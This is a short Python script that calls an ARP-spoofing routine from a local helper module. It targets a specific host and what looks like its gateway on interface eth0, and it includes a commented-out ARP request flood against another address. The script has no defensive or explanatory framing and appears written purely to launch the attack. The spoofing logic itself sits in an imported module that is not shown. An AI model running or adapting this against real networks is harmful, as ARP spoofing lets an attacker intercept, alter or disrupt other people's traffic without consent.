#!/usr/bin/env python 
from optparse import OptionParser
from include import arpframe
from include import utils

#####################################################################################

if __name__ == "__main__":
	myip = utils.getinterface_ip("eth0")
	#arpframe.arprequestflood("eth0", "10.1.14.69")
	arpframe.arpspoof("eth0","10.1.14.112","10.1.8.1")


